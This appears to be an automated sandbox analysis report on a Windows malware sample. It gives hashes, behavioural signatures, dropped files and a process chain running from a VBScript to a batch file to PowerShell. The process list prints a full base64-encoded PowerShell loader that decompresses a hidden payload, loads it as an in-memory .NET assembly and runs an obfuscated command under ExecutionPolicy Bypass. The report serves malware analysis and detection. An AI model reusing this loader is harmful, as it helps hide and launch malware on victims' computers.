Analysis
-
max time kernel
118s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
17-04-2024 13:10
Static task
static1
Behavioral task
behavioral1
Sample
55327bff1fa5fe9b81bbe47faa4c8e102fe2fc0b02148fe9677a4e44cc6d7a77.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
55327bff1fa5fe9b81bbe47faa4c8e102fe2fc0b02148fe9677a4e44cc6d7a77.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
⠨/start.vbs
Resource
win7-20240220-en
Behavioral task
behavioral4
Sample
⠨/start.vbs
Resource
win10v2004-20240412-en
Behavioral task
behavioral5
Sample
⠨/temp.bat
Resource
win7-20240220-en
Behavioral task
behavioral6
Sample
⠨/temp.bat
Resource
win10v2004-20240412-en
General
-
Target
55327bff1fa5fe9b81bbe47faa4c8e102fe2fc0b02148fe9677a4e44cc6d7a77.exe
-
Size
271KB
-
MD5
8b8db4eaa6f5368eb5f64359c6197b43
-
SHA1
e9b51842e2d2f39fa06e466ae73af341ddffe1c8
-
SHA256
55327bff1fa5fe9b81bbe47faa4c8e102fe2fc0b02148fe9677a4e44cc6d7a77
-
SHA512
4da734da30af148f246f433b71c72677b9f78698424db15eba364233dff183cb998f9be13d2832872829ac545be1e15ff75ceb85fca3fd0784265fd576db0056
-
SSDEEP
6144:xfL+oq+hnjsVl3dRQTLU+2bRRR17+fYHPfIMDPSBJ7Y/B4aSi3V:xfL5njsVlNuc++Rj17+fYHPfIg4Y54ap
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepowershell.exepid process 2504 powershell.exe 2488 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 2504 powershell.exe Token: SeDebugPrivilege 2488 powershell.exe -
Suspicious use of WriteProcessMemory 16 IoCs
Processes:
55327bff1fa5fe9b81bbe47faa4c8e102fe2fc0b02148fe9677a4e44cc6d7a77.exewscript.execmd.exedescription pid process target process PID 2292 wrote to memory of 2136 2292 55327bff1fa5fe9b81bbe47faa4c8e102fe2fc0b02148fe9677a4e44cc6d7a77.exe wscript.exe PID 2292 wrote to memory of 2136 2292 55327bff1fa5fe9b81bbe47faa4c8e102fe2fc0b02148fe9677a4e44cc6d7a77.exe wscript.exe PID 2292 wrote to memory of 2136 2292 55327bff1fa5fe9b81bbe47faa4c8e102fe2fc0b02148fe9677a4e44cc6d7a77.exe wscript.exe PID 2292 wrote to memory of 2136 2292 55327bff1fa5fe9b81bbe47faa4c8e102fe2fc0b02148fe9677a4e44cc6d7a77.exe wscript.exe PID 2136 wrote to memory of 2996 2136 wscript.exe cmd.exe PID 2136 wrote to memory of 2996 2136 wscript.exe cmd.exe PID 2136 wrote to memory of 2996 2136 wscript.exe cmd.exe PID 2136 wrote to memory of 2996 2136 wscript.exe cmd.exe PID 2996 wrote to memory of 2504 2996 cmd.exe powershell.exe PID 2996 wrote to memory of 2504 2996 cmd.exe powershell.exe PID 2996 wrote to memory of 2504 2996 cmd.exe powershell.exe PID 2996 wrote to memory of 2504 2996 cmd.exe powershell.exe PID 2996 wrote to memory of 2488 2996 cmd.exe powershell.exe PID 2996 wrote to memory of 2488 2996 cmd.exe powershell.exe PID 2996 wrote to memory of 2488 2996 cmd.exe powershell.exe PID 2996 wrote to memory of 2488 2996 cmd.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\55327bff1fa5fe9b81bbe47faa4c8e102fe2fc0b02148fe9677a4e44cc6d7a77.exe"C:\Users\Admin\AppData\Local\Temp\55327bff1fa5fe9b81bbe47faa4c8e102fe2fc0b02148fe9677a4e44cc6d7a77.exe"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\wscript.exe"wscript.exe" "C:\Users\Admin\start.vbs"2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ""C:\Users\Admin\temp.bat" "3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -command "[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('ZnVuY3Rpb24gRGVjb21wcmVzc0J5dGVzKCRjb21wcmVzc2VkRGF0YSkgeyAkbXMgPSBbSU8uTWVtb3J5U3RyZWFtXTo6bmV3KChbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRjb21wcmVzc2VkRGF0YSkpKTsgJG1zLlBvc2l0aW9uID0gMDsgJGRlZmxhdGVTdHJlYW0gPSBbSU8uQ29tcHJlc3Npb24uRGVmbGF0ZVN0cmVhbV06Om5ldygkbXMsIFtJTy5Db21wcmVzc2lvbi5Db21wcmVzc2lvbk1vZGVdOjpEZWNvbXByZXNzKTsgJGJ1ZmZlciA9IFtieXRlW11dOjpuZXcoNDA5Nik7ICRtcyA9IFtJTy5NZW1vcnlTdHJlYW1dOjpuZXcoKTsgd2hpbGUgKCR0cnVlKSB7ICRjb3VudCA9ICRkZWZsYXRlU3RyZWFtLlJlYWQoJGJ1ZmZlciwgMCwgJGJ1ZmZlci5MZW5ndGgpOyBpZiAoJGNvdW50IC1lcSAwKSB7IGJyZWFrIH0gJG1zLldyaXRlKCRidWZmZXIsIDAsICRjb3VudCkgfSAkZGVmbGF0ZVN0cmVhbS5DbG9zZSgpOyAkbXMuVG9BcnJheSgpIH0NCg0KZnVuY3Rpb24gUmV2ZXJzZVN0cmluZygkaW5wdXRTdHJpbmcpIHsNCiAgICAkY2hhckFycmF5ID0gJGlucHV0U3RyaW5nLlRvQ2hhckFycmF5KCkgICMgQ29udmVydCBzdHJpbmcgdG8gY2hhcmFjdGVyIGFycmF5DQogICAgJHJldmVyc2VkQXJyYXkgPSAkY2hhckFycmF5Wy0xLi4tKCRjaGFyQXJyYXkuTGVuZ3RoKV0gICMgUmV2ZXJzZSB0aGUgYXJyYXkNCiAgICAkcmV2ZXJzZWRTdHJpbmcgPSAtam9pbiAkcmV2ZXJzZWRBcnJheSAgIyBDb252ZXJ0IHRoZSByZXZlcnNlZCBhcnJheSBiYWNrIHRvIGEgc3RyaW5nDQogICAgcmV0dXJuICRyZXZlcnNlZFN0cmluZw0KfQ0KDQpmdW5jdGlvbiBDbG9zZS1Qcm9jZXNzIHsNCiAgICBwYXJhbSgNCiAgICAgICAgW3N0cmluZ10kUHJvY2Vzc05hbWUNCiAgICApDQoNCiAgICAkcHJvY2VzcyA9IEdldC1Qcm9jZXNzIC1OYW1lICRQcm9jZXNzTmFtZSAtRXJyb3JBY3Rpb24gU2lsZW50bHlDb250aW51ZQ0KDQogICAgaWYgKCRwcm9jZXNzIC1uZSAkbnVsbCkgew0KICAgICAgICBTdG9wLVByb2Nlc3MgLU5hbWUgJFByb2Nlc3NOYW1lIC1Gb3JjZQ0KCX0NCn0NCg0KZnVuY3Rpb24gQ29udmVydC1Bc2NpaVRvU3RyaW5nKCRhc2NpaUFycmF5KXsNCiRvZmZTZXRJbnRlZ2VyPTEyMzsNCiRkZWNvZGVkU3RyaW5nPSROdWxsOw0KZm9yZWFjaCgkYXNjaWlJbnRlZ2VyIGluICRhc2NpaUFycmF5KXskZGVjb2RlZFN0cmluZys9W2NoYXJdKCRhc2NpaUludGVnZXItJG9mZlNldEludGVnZXIpfTsNCnJldHVybiAkZGVjb2RlZFN0cmluZ307DQoNCg0KJGVuY29kZWRBcnJheSA9IEAoMTU5LDIyMCwyMzgsMjM4LDIyNCwyMzIsMjIxLDIzMSwyNDQsMTY5LDE5MiwyMzMsMjM5LDIzNywyNDQsMjAzLDIzNCwyMjgsMjMzLDIzOSwxNjksMTk2LDIzMywyNDEsMjM0LDIzMCwyMjQsMTYzLDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY3LDE1OSwyMzMsMjQwLDIzMSwyMzEsMTY0LDE4MikNCiRkZWNvZGVkU3RyaW5nID0gQ29udmVydC1Bc2NpaVRvU3RyaW5nICRlbmNvZGVkQXJyYXkNCg0KDQokZmlsZVBhdGggPSBKb2luLVBhdGggJGVudjpVc2VyUHJvZmlsZSAiLXRlbXAuYmF0Ig0KJGxhc3RMaW5lID0gR2V0LUNvbnRlbnQgLVBhdGggJGZpbGVQYXRoIHwgU2VsZWN0LU9iamVjdCAtTGFzdCAxDQokY2xlYW5lZExpbmUgPSAkbGFzdExpbmUgLXJlcGxhY2UgJ146OicNCiRyZXZlcnNlID0gUmV2ZXJzZVN0cmluZyAkY2xlYW5lZExpbmUNCiRkZWNvbXByZXNzZWRCeXRlID0gRGVjb21wcmVzc0J5dGVzIC1jb21wcmVzc2VkRGF0YSAkcmV2ZXJzZQ0KDQokYXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKFtieXRlW11dJGRlY29tcHJlc3NlZEJ5dGUpDQoNCiRhc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoW2J5dGVbXV0kZGVjb21wcmVzc2VkQnl0ZSkNCg0KSW52b2tlLUV4cHJlc3Npb24gJGRlY29kZWRTdHJpbmcNCg0KQ2xvc2UtUHJvY2VzcyAtUHJvY2Vzc05hbWUgImNtZCI=')) | Out-File -FilePath 'C:\Users\Admin\-temp.ps1' -Encoding UTF8"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File "C:\Users\Admin\-temp.ps1"4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\-temp.ps1Filesize
1KB
MD5ee6d2d219d1affb98fb9dc1de51d895e
SHA1aaa2ceb5f7214c76b8a050a06d257cdc30d6bb48
SHA256017fb2bedc94f0480d208611df6b42589d407fc4338e1f5dc1e00a9fd52752e0
SHA51252139b56af32835b93fb8eb93b553325e36654debe5c15e6b61930ffe8027e0ee5eb0998da4c37ec047c052522a022d7103c33d7495eb1a3504cfee1780229bf
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msFilesize
7KB
MD5066cabe897523579916e8cd278ef5a77
SHA1f389ccfdbc2c8dbe5e8c2daecdbacf17a1daafce
SHA25698146d56ad593dad61aa2c997c86d119255d945bc339b1da7a54637dccbfc11d
SHA512898d93523912a3792e85ca0a52a976fbc78c49bc51efbb90c9c9e58c8b14857f3914695e9bc0045bb1568ffa95a04f841d078d0690f1b752852adbc111bc5f9c
-
C:\Users\Admin\start.vbsFilesize
231B
MD5abe1dd23ab4c11aae54f1898c780c0b5
SHA1bb2f974b3e0af2baa40920b475582bfd4fb28001
SHA25689054e19532a9a62ca3403a8899495bf6f06557ff886b475a04227eb8aba7b12
SHA512e9ec437a32301078ea69ce2f36dadab68315d5e56d94c4d579d3409ccbe0c9e00c3aed7baa0fa6d656fb8ed23213f4c01fb2d108c1a0ed11c58c76cd00f9a99d
-
C:\Users\Admin\temp.batFilesize
204KB
MD572b17467a49b7813856fa604d1d291c8
SHA13116d07854d56f0bc505be8b80804a7319208739
SHA256e24aaddfa2ece0891ad7b3c51779c65bbf95e4fded59fc46fe4fef311e1de3e1
SHA51238c99cc716097ee7cb642203432ffbd1ef6ce8a0c9b21aa2827962b82456ecb3113fa1edd362aab013737e3bdfb2d0803145fc0caf612054ba47f6454c3a4843
-
memory/2488-19-0x0000000074540000-0x0000000074AEB000-memory.dmpFilesize
5.7MB
-
memory/2488-26-0x00000000028A0000-0x00000000028E0000-memory.dmpFilesize
256KB
-
memory/2488-29-0x00000000028A0000-0x00000000028E0000-memory.dmpFilesize
256KB
-
memory/2488-28-0x00000000028A0000-0x00000000028E0000-memory.dmpFilesize
256KB
-
memory/2488-27-0x0000000074540000-0x0000000074AEB000-memory.dmpFilesize
5.7MB
-
memory/2488-20-0x00000000028A0000-0x00000000028E0000-memory.dmpFilesize
256KB
-
memory/2488-21-0x0000000074540000-0x0000000074AEB000-memory.dmpFilesize
5.7MB
-
memory/2488-22-0x00000000028A0000-0x00000000028E0000-memory.dmpFilesize
256KB
-
memory/2488-25-0x0000000074540000-0x0000000074AEB000-memory.dmpFilesize
5.7MB
-
memory/2504-8-0x0000000074560000-0x0000000074B0B000-memory.dmpFilesize
5.7MB
-
memory/2504-11-0x00000000028D0000-0x0000000002910000-memory.dmpFilesize
256KB
-
memory/2504-9-0x0000000074560000-0x0000000074B0B000-memory.dmpFilesize
5.7MB
-
memory/2504-10-0x00000000028D0000-0x0000000002910000-memory.dmpFilesize
256KB
-
memory/2504-13-0x0000000074560000-0x0000000074B0B000-memory.dmpFilesize
5.7MB